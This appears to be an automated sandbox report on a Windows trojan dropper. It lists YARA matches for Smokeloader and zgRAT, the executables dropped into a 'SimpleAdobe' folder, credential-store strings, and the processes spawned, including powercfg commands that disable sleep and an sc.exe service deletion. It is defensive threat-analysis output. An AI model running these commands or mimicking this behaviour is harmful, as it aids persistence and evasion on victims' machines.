Source: 0000001D.00000002.2876108133.00000000011D1000.00000020.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
Source: C:\Users\user\Documents\SimpleAdobe\g1nHVnlr2tXTEWQsRz_M547D.exe, type: DROPPED	Matched rule: INDICATOR_EXE_Packed_DotNetReactor author = ditekSHen, description = Detects executables packed with unregistered version of .NET Reactor
Source: C:\Users\user\Documents\SimpleAdobe\g1nHVnlr2tXTEWQsRz_M547D.exe, type: DROPPED	Matched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
Source: C:\Users\user\Documents\SimpleAdobe\fSJI2dwukNtWVEjIwlXBl7N4.exe, type: DROPPED	Matched rule: INDICATOR_EXE_Packed_DotNetReactor author = ditekSHen, description = Detects executables packed with unregistered version of .NET Reactor

Source: Start[1].exe.0.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: fq9BbqPKEgDrDHrc1Aru5zuA.exe.0.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: cTThtD77H613MBNsXAevJo07.exe.0.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: tskTMObYcvz1CtypLgyOWpYi.exe.0.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: i1crvbOZAP.exe	Static PE information: Section: ZLIB complexity 0.999704699933687
Source: i1crvbOZAP.exe	Static PE information: Section: ZLIB complexity 0.9994290865384615
Source: i1crvbOZAP.exe	Static PE information: Section: ZLIB complexity 0.9905450994318182
Source: i1crvbOZAP.exe	Static PE information: Section: .reloc ZLIB complexity 1.5
Source: amadka[1].exe.0.dr	Static PE information: Section: ZLIB complexity 0.9975756115951743
Source: amadka[1].exe.0.dr	Static PE information: Section: iomijoue ZLIB complexity 0.9946905284538036
Source: tiToqF4gUiKaoPfx2yS40yxZ.exe.0.dr	Static PE information: Section: ZLIB complexity 0.9975756115951743
Source: tiToqF4gUiKaoPfx2yS40yxZ.exe.0.dr	Static PE information: Section: iomijoue ZLIB complexity 0.9946905284538036

Source: Start[1].exe.0.dr, gBMthepoZSL1ZVKpeA.cs	Cryptographic APIs: 'CreateDecryptor'
Source: Start[1].exe.0.dr, gBMthepoZSL1ZVKpeA.cs	Cryptographic APIs: 'CreateDecryptor'
Source: fq9BbqPKEgDrDHrc1Aru5zuA.exe.0.dr, gBMthepoZSL1ZVKpeA.cs	Cryptographic APIs: 'CreateDecryptor'
Source: fq9BbqPKEgDrDHrc1Aru5zuA.exe.0.dr, gBMthepoZSL1ZVKpeA.cs	Cryptographic APIs: 'CreateDecryptor'
Source: cTThtD77H613MBNsXAevJo07.exe.0.dr, gBMthepoZSL1ZVKpeA.cs	Cryptographic APIs: 'CreateDecryptor'
Source: cTThtD77H613MBNsXAevJo07.exe.0.dr, gBMthepoZSL1ZVKpeA.cs	Cryptographic APIs: 'CreateDecryptor'
Source: cTThtD77H613MBNsXAevJo07.exe.0.dr, gBMthepoZSL1ZVKpeA.cs	Cryptographic APIs: 'CreateDecryptor'
Source: tskTMObYcvz1CtypLgyOWpYi.exe.0.dr, gBMthepoZSL1ZVKpeA.cs	Cryptographic APIs: 'CreateDecryptor'
Source: tskTMObYcvz1CtypLgyOWpYi.exe.0.dr, gBMthepoZSL1ZVKpeA.cs	Cryptographic APIs: 'CreateDecryptor'
Source: tskTMObYcvz1CtypLgyOWpYi.exe.0.dr, gBMthepoZSL1ZVKpeA.cs	Cryptographic APIs: 'CreateDecryptor'

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@132/206@30/38

Source: C:\Users\user\Documents\SimpleAdobe\D5ft_dAZwUuL52qmUM1rPffT.exe

Code function: 12_2_65907030 GetLastError,FormatMessageA,__acrt_iob_func,__acrt_iob_func,__acrt_iob_func,fflush,LocalFree,

12_2_65907030

Source: C:\Users\user\Documents\SimpleAdobe\Y8KGRj_sUjw5KjZpIoRDoSwV.exe

Code function: 11_2_0040936C GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,

11_2_0040936C

Source: C:\Users\user\Documents\SimpleAdobe\D5ft_dAZwUuL52qmUM1rPffT.exe

Code function: 12_2_00415D00 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,

12_2_00415D00

Source: C:\Users\user\Documents\SimpleAdobe\Y8KGRj_sUjw5KjZpIoRDoSwV.exe

Code function: 11_2_00409AD0 FindResourceA,SizeofResource,LoadResource,LockResource,

11_2_00409AD0

Source: C:\Users\user\Desktop\i1crvbOZAP.exe

File created: C:\Users\user\Documents\SimpleAdobe

Jump to behavior

Source: C:\Users\user\Documents\SimpleAdobe\fSJI2dwukNtWVEjIwlXBl7N4.exe	Mutant created: NULL
Source: C:\Users\user\Documents\SimpleAdobe\tiToqF4gUiKaoPfx2yS40yxZ.exe	Mutant created: \Sessions\1\BaseNamedObjects\a091ec0a6e22276a96a99c1d34ef679c
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7760:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7288:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4048:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7768:120:WilError_03
Source: C:\Users\user\Desktop\i1crvbOZAP.exe	Mutant created: \Sessions\1\BaseNamedObjects\JarakHalgWW_12
Source: C:\Users\user\Documents\SimpleAdobe\g1nHVnlr2tXTEWQsRz_M547D.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\Protect544cd51a.dll
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6904:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6988:120:WilError_03
Source: C:\Windows\SysWOW64\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7632
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7776:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7284:120:WilError_03

Source: C:\Users\user\Documents\SimpleAdobe\uRWnWA7bjEhugCQgmREIdGsh.exe

File created: C:\Users\user\AppData\Local\Temp\adobe4Dhfe16ixIzr

Jump to behavior

Source: C:\Users\user\Documents\SimpleAdobe\uRWnWA7bjEhugCQgmREIdGsh.exe

Command line argument: nI#

5_2_002348C0

Source: C:\Users\user\Documents\SimpleAdobe\KUc3lCE6xAEEreIlM0ct4583.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Name FROM Win32_Processor
Source: C:\Users\user\Documents\SimpleAdobe\RMz4w55AcOQKH9K459dvrUGA.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Name FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process Where SessionId='1'

Source: C:\Users\user\Desktop\i1crvbOZAP.exe

File read: C:\Windows\System32\GroupPolicy\gpt.ini

Jump to behavior

Source: C:\Users\user\Desktop\i1crvbOZAP.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\is-K8PDA.tmp\Y8KGRj_sUjw5KjZpIoRDoSwV.tmp

Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOrganization

Source: i1crvbOZAP.exe, 00000000.00000003.1618451810.0000029625940000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: UPDATE %Q.%s SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' \|\| %Q \|\| substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: i1crvbOZAP.exe, 00000000.00000003.1618451810.0000029625940000.00000004.00001000.00020000.00000000.sdmp, uRWnWA7bjEhugCQgmREIdGsh.exe, 00000005.00000002.2881330381.000000000023F000.00000002.00000001.01000000.00000006.sdmp	Binary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
Source: D5ft_dAZwUuL52qmUM1rPffT.exe, 0000000C.00000002.2638909352.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, D5ft_dAZwUuL52qmUM1rPffT.exe, 0000000C.00000002.2555837578.000000001B378000.00000004.00000020.00020000.00000000.sdmp, D5ft_dAZwUuL52qmUM1rPffT.exe, 0000000C.00000002.2648652506.0000000065ADF000.00000002.00000001.01000000.00000026.sdmp	Binary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' \|\| %Q \|\| substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: D5ft_dAZwUuL52qmUM1rPffT.exe, 0000000C.00000002.2638909352.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, D5ft_dAZwUuL52qmUM1rPffT.exe, 0000000C.00000002.2555837578.000000001B378000.00000004.00000020.00020000.00000000.sdmp, D5ft_dAZwUuL52qmUM1rPffT.exe, 0000000C.00000002.2648652506.0000000065ADF000.00000002.00000001.01000000.00000026.sdmp	Binary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
Source: D5ft_dAZwUuL52qmUM1rPffT.exe, 0000000C.00000002.2638909352.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, D5ft_dAZwUuL52qmUM1rPffT.exe, 0000000C.00000002.2555837578.000000001B378000.00000004.00000020.00020000.00000000.sdmp, D5ft_dAZwUuL52qmUM1rPffT.exe, 0000000C.00000002.2648652506.0000000065ADF000.00000002.00000001.01000000.00000026.sdmp	Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
Source: uRWnWA7bjEhugCQgmREIdGsh.exe, 00000005.00000002.2881330381.000000000023F000.00000002.00000001.01000000.00000006.sdmp	Binary or memory string: UPDATE %Q.%s SET sql = sqlite_rename_table(sql, %Q), tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' \|\| %Q \|\| substr(name,%d+18) ELSE name END WHERE tbl_name=%Q AND (type='table' OR type='index' OR type='trigger');
Source: D5ft_dAZwUuL52qmUM1rPffT.exe, 0000000C.00000002.2638909352.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, D5ft_dAZwUuL52qmUM1rPffT.exe, 0000000C.00000002.2555837578.000000001B378000.00000004.00000020.00020000.00000000.sdmp, D5ft_dAZwUuL52qmUM1rPffT.exe, 0000000C.00000002.2648652506.0000000065ADF000.00000002.00000001.01000000.00000026.sdmp	Binary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
Source: D5ft_dAZwUuL52qmUM1rPffT.exe, D5ft_dAZwUuL52qmUM1rPffT.exe, 0000000C.00000002.2638909352.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, D5ft_dAZwUuL52qmUM1rPffT.exe, 0000000C.00000002.2555837578.000000001B378000.00000004.00000020.00020000.00000000.sdmp, D5ft_dAZwUuL52qmUM1rPffT.exe, 0000000C.00000002.2648652506.0000000065ADF000.00000002.00000001.01000000.00000026.sdmp	Binary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
Source: D5ft_dAZwUuL52qmUM1rPffT.exe, 0000000C.00000002.2638909352.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, D5ft_dAZwUuL52qmUM1rPffT.exe, 0000000C.00000002.2555837578.000000001B378000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE x(addr INT,opcode TEXT,p1 INT,p2 INT,p3 INT,p4 TEXT,p5 INT,comment TEXT,subprog TEXT,stmt HIDDEN);
Source: D5ft_dAZwUuL52qmUM1rPffT.exe, 0000000C.00000002.2638909352.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, D5ft_dAZwUuL52qmUM1rPffT.exe, 0000000C.00000002.2555837578.000000001B378000.00000004.00000020.00020000.00000000.sdmp, D5ft_dAZwUuL52qmUM1rPffT.exe, 0000000C.00000002.2648652506.0000000065ADF000.00000002.00000001.01000000.00000026.sdmp	Binary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
Source: D5ft_dAZwUuL52qmUM1rPffT.exe, 0000000C.00000003.2018301948.00000000212F4000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: D5ft_dAZwUuL52qmUM1rPffT.exe, 0000000C.00000002.2638909352.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, D5ft_dAZwUuL52qmUM1rPffT.exe, 0000000C.00000002.2555837578.000000001B378000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
Source: D5ft_dAZwUuL52qmUM1rPffT.exe, 0000000C.00000002.2638909352.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, D5ft_dAZwUuL52qmUM1rPffT.exe, 0000000C.00000002.2555837578.000000001B378000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE x(type TEXT,schema TEXT,name TEXT,wr INT,subprog TEXT,stmt HIDDEN);

Source: i1crvbOZAP.exe	Virustotal: Detection: 27%
Source: i1crvbOZAP.exe	ReversingLabs: Detection: 42%

Source: KUc3lCE6xAEEreIlM0ct4583.exe	String found in binary or memory: REQUESTED-ADDRESS-FAMILYRequest Entity Too LargeSA Eastern Standard TimeSA Pacific Standard TimeSA Western Standard TimeSafeArrayAllocDescriptorSetConsoleCursorPositionSetDefaultDllDirectoriesSetupDiCreateDeviceInfoWSetupDiGetSelectedDeviceSetupDiSetSelectedDe
Source: KUc3lCE6xAEEreIlM0ct4583.exe	String found in binary or memory: yscalltick= work.nproc= work.nwait= %s/rawaddr/%s%s\%s\drivers, gp->status=, not pointer-bind-address-byte block (3814697265625: unknown pc Accept-RangesAuthorizationCLIENT_RANDOMCONNECTION-IDCONNECT_ERRORCache-ControlCertOpenStoreCoTaskMemFreeConnectServerCo
Source: KUc3lCE6xAEEreIlM0ct4583.exe	String found in binary or memory: PED-ADDRESSMAX_FRAME_SIZEMB; allocated MakeAbsoluteSDMissing quotesModule32FirstWNetUserGetInfoNot AcceptableNtResumeThreadOSArchitectureOpenSCManagerWOther_ID_StartPROTOCOL_ERRORPattern_SyntaxProcess32NextWProtection DirQuotation_MarkRCodeNameErrorREFUSED_STR
Source: KUc3lCE6xAEEreIlM0ct4583.exe	String found in binary or memory: inateProcessTor current modeTor is dowloadedTranslateMessageTrustedInstallerUnregisterClassWUpgrade RequiredUser-Agent: %s VirtualProtectExWinVerifyTrustExWindows DefenderWww-AuthenticateXOR-PEER-ADDRESSZanabazar_Square\windefender.exe runtime stack: address
Source: KUc3lCE6xAEEreIlM0ct4583.exe	String found in binary or memory: unknown network unpacking headerworkbuf is emptywrite config: %wwww-authenticate spinningthreads=%%!%c(big.Int=%s)%s/address/%s/txs, p.searchAddr = 0123456789ABCDEFX0123456789abcdefx060102150405Z07001192092895507812559604644775390625: missing method AdjustToke
Source: KUc3lCE6xAEEreIlM0ct4583.exe	String found in binary or memory: Temporary RedirectTerminateJobObjectTime.MarshalJSON: Time.MarshalText: UNKNOWN-ATTRIBUTESUNKNOWN_SETTING_%dUnknown value typeVariation_SelectorWeb Downloader/6.9WriteProcessMemoryXOR-MAPPED-ADDRESSadaptivestackstartbad Content-Lengthbad manualFreeListbufio: b
Source: KUc3lCE6xAEEreIlM0ct4583.exe	String found in binary or memory: .654WDG_Validator/1.6.2WSALookupServiceEndWaitForSingleObjectWindowsCreateStringWindowsDeleteStringWinmonSystemMonitorXOR-RELAYED-ADDRESSYukon Standard Timeadjusttimers: bad pafter array elementattribute not foundbad ABI descriptionbad file descriptorbad kind

Source: unknown	Process created: C:\Users\user\Desktop\i1crvbOZAP.exe "C:\Users\user\Desktop\i1crvbOZAP.exe"
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k NetSvcs -p -s NcaSvc
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum
Source: C:\Users\user\Desktop\i1crvbOZAP.exe	Process created: C:\Users\user\Documents\SimpleAdobe\uRWnWA7bjEhugCQgmREIdGsh.exe C:\Users\user\Documents\SimpleAdobe\uRWnWA7bjEhugCQgmREIdGsh.exe
Source: C:\Users\user\Desktop\i1crvbOZAP.exe	Process created: C:\Users\user\Documents\SimpleAdobe\cTThtD77H613MBNsXAevJo07.exe C:\Users\user\Documents\SimpleAdobe\cTThtD77H613MBNsXAevJo07.exe
Source: C:\Users\user\Desktop\i1crvbOZAP.exe	Process created: C:\Users\user\Documents\SimpleAdobe\tskTMObYcvz1CtypLgyOWpYi.exe C:\Users\user\Documents\SimpleAdobe\tskTMObYcvz1CtypLgyOWpYi.exe
Source: C:\Users\user\Desktop\i1crvbOZAP.exe	Process created: C:\Users\user\Documents\SimpleAdobe\fq9BbqPKEgDrDHrc1Aru5zuA.exe C:\Users\user\Documents\SimpleAdobe\fq9BbqPKEgDrDHrc1Aru5zuA.exe
Source: C:\Users\user\Desktop\i1crvbOZAP.exe	Process created: C:\Users\user\Documents\SimpleAdobe\g1nHVnlr2tXTEWQsRz_M547D.exe C:\Users\user\Documents\SimpleAdobe\g1nHVnlr2tXTEWQsRz_M547D.exe
Source: C:\Users\user\Desktop\i1crvbOZAP.exe	Process created: C:\Users\user\Documents\SimpleAdobe\KUc3lCE6xAEEreIlM0ct4583.exe C:\Users\user\Documents\SimpleAdobe\KUc3lCE6xAEEreIlM0ct4583.exe
Source: C:\Users\user\Desktop\i1crvbOZAP.exe	Process created: C:\Users\user\Documents\SimpleAdobe\Y8KGRj_sUjw5KjZpIoRDoSwV.exe C:\Users\user\Documents\SimpleAdobe\Y8KGRj_sUjw5KjZpIoRDoSwV.exe
Source: C:\Users\user\Desktop\i1crvbOZAP.exe	Process created: C:\Users\user\Documents\SimpleAdobe\D5ft_dAZwUuL52qmUM1rPffT.exe C:\Users\user\Documents\SimpleAdobe\D5ft_dAZwUuL52qmUM1rPffT.exe
Source: C:\Users\user\Desktop\i1crvbOZAP.exe	Process created: C:\Users\user\Documents\SimpleAdobe\RMz4w55AcOQKH9K459dvrUGA.exe C:\Users\user\Documents\SimpleAdobe\RMz4w55AcOQKH9K459dvrUGA.exe
Source: C:\Users\user\Desktop\i1crvbOZAP.exe	Process created: C:\Users\user\Documents\SimpleAdobe\CQTbcHuZCBIaghzHIvMnZgpt.exe C:\Users\user\Documents\SimpleAdobe\CQTbcHuZCBIaghzHIvMnZgpt.exe
Source: C:\Users\user\Desktop\i1crvbOZAP.exe	Process created: C:\Users\user\Documents\SimpleAdobe\I4B42zAlYY8EYRVPVQPCuOQX.exe C:\Users\user\Documents\SimpleAdobe\I4B42zAlYY8EYRVPVQPCuOQX.exe
Source: C:\Users\user\Desktop\i1crvbOZAP.exe	Process created: C:\Users\user\Documents\SimpleAdobe\tiToqF4gUiKaoPfx2yS40yxZ.exe C:\Users\user\Documents\SimpleAdobe\tiToqF4gUiKaoPfx2yS40yxZ.exe
Source: C:\Users\user\Desktop\i1crvbOZAP.exe	Process created: C:\Users\user\Documents\SimpleAdobe\6JHxagCVExT6_J_NgFfNr8iE.exe C:\Users\user\Documents\SimpleAdobe\6JHxagCVExT6_J_NgFfNr8iE.exe
Source: C:\Users\user\Desktop\i1crvbOZAP.exe	Process created: C:\Users\user\Documents\SimpleAdobe\DcuyIDqrnrOUlJGUzTDFRaZm.exe C:\Users\user\Documents\SimpleAdobe\DcuyIDqrnrOUlJGUzTDFRaZm.exe
Source: C:\Users\user\Desktop\i1crvbOZAP.exe	Process created: C:\Users\user\Documents\SimpleAdobe\xDVBd5GtHhrlSm0slOnr7_gW.exe C:\Users\user\Documents\SimpleAdobe\xDVBd5GtHhrlSm0slOnr7_gW.exe
Source: C:\Users\user\Desktop\i1crvbOZAP.exe	Process created: C:\Users\user\Documents\SimpleAdobe\csscx6pq5pjO0BwzvKMjhfKE.exe C:\Users\user\Documents\SimpleAdobe\csscx6pq5pjO0BwzvKMjhfKE.exe
Source: C:\Users\user\Documents\SimpleAdobe\tskTMObYcvz1CtypLgyOWpYi.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Documents\SimpleAdobe\fq9BbqPKEgDrDHrc1Aru5zuA.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Documents\SimpleAdobe\cTThtD77H613MBNsXAevJo07.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Source: C:\Users\user\Documents\SimpleAdobe\cTThtD77H613MBNsXAevJo07.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Users\user\Documents\SimpleAdobe\fq9BbqPKEgDrDHrc1Aru5zuA.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Users\user\Documents\SimpleAdobe\tskTMObYcvz1CtypLgyOWpYi.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k WerSvcGroup
Source: C:\Users\user\Documents\SimpleAdobe\Y8KGRj_sUjw5KjZpIoRDoSwV.exe	Process created: C:\Users\user\AppData\Local\Temp\is-K8PDA.tmp\Y8KGRj_sUjw5KjZpIoRDoSwV.tmp "C:\Users\user\AppData\Local\Temp\is-K8PDA.tmp\Y8KGRj_sUjw5KjZpIoRDoSwV.tmp" /SL5="$50440,1578341,54272,C:\Users\user\Documents\SimpleAdobe\Y8KGRj_sUjw5KjZpIoRDoSwV.exe"
Source: C:\Windows\System32\svchost.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 460 -p 7624 -ip 7624
Source: C:\Windows\System32\svchost.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 476 -p 7632 -ip 7632
Source: C:\Users\user\Documents\SimpleAdobe\CQTbcHuZCBIaghzHIvMnZgpt.exe	Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
Source: C:\Windows\System32\svchost.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 484 -p 7616 -ip 7616
Source: C:\Users\user\Documents\SimpleAdobe\csscx6pq5pjO0BwzvKMjhfKE.exe	Process created: C:\Users\user\AppData\Local\Temp\7zS94A6.tmp\Install.exe .\Install.exe
Source: C:\Users\user\Documents\SimpleAdobe\CQTbcHuZCBIaghzHIvMnZgpt.exe	Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
Source: C:\Windows\System32\powercfg.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Documents\SimpleAdobe\CQTbcHuZCBIaghzHIvMnZgpt.exe	Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
Source: C:\Windows\System32\powercfg.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Documents\SimpleAdobe\CQTbcHuZCBIaghzHIvMnZgpt.exe	Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
Source: C:\Windows\System32\powercfg.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\i1crvbOZAP.exe	Process created: C:\Users\user\Documents\SimpleAdobe\fSJI2dwukNtWVEjIwlXBl7N4.exe C:\Users\user\Documents\SimpleAdobe\fSJI2dwukNtWVEjIwlXBl7N4.exe
Source: C:\Users\user\Documents\SimpleAdobe\CQTbcHuZCBIaghzHIvMnZgpt.exe	Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe delete "OBGPQMHF"
Source: C:\Windows\System32\powercfg.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\sc.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Documents\SimpleAdobe\fq9BbqPKEgDrDHrc1Aru5zuA.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7632 -s 980
Source: C:\Users\user\Desktop\i1crvbOZAP.exe	Process created: C:\Users\user\Documents\SimpleAdobe\uRWnWA7bjEhugCQgmREIdGsh.exe C:\Users\user\Documents\SimpleAdobe\uRWnWA7bjEhugCQgmREIdGsh.exe	Jump to behavior
Source: C:\Users\user\Desktop\i1crvbOZAP.exe	Process created: C:\Users\user\Documents\SimpleAdobe\cTThtD77H613MBNsXAevJo07.exe C:\Users\user\Documents\SimpleAdobe\cTThtD77H613MBNsXAevJo07.exe	Jump to behavior
Source: C:\Users\user\Desktop\i1crvbOZAP.exe	Process created: C:\Users\user\Documents\SimpleAdobe\tskTMObYcvz1CtypLgyOWpYi.exe C:\Users\user\Documents\SimpleAdobe\tskTMObYcvz1CtypLgyOWpYi.exe	Jump to behavior
Source: C:\Users\user\Desktop\i1crvbOZAP.exe	Process created: C:\Users\user\Documents\SimpleAdobe\fq9BbqPKEgDrDHrc1Aru5zuA.exe C:\Users\user\Documents\SimpleAdobe\fq9BbqPKEgDrDHrc1Aru5zuA.exe	Jump to behavior
Source: C:\Users\user\Desktop\i1crvbOZAP.exe	Process created: C:\Users\user\Documents\SimpleAdobe\g1nHVnlr2tXTEWQsRz_M547D.exe C:\Users\user\Documents\SimpleAdobe\g1nHVnlr2tXTEWQsRz_M547D.exe	Jump to behavior
Source: C:\Users\user\Desktop\i1crvbOZAP.exe	Process created: C:\Users\user\Documents\SimpleAdobe\KUc3lCE6xAEEreIlM0ct4583.exe C:\Users\user\Documents\SimpleAdobe\KUc3lCE6xAEEreIlM0ct4583.exe	Jump to behavior
Source: C:\Users\user\Desktop\i1crvbOZAP.exe	Process created: C:\Users\user\Documents\SimpleAdobe\Y8KGRj_sUjw5KjZpIoRDoSwV.exe C:\Users\user\Documents\SimpleAdobe\Y8KGRj_sUjw5KjZpIoRDoSwV.exe	Jump to behavior
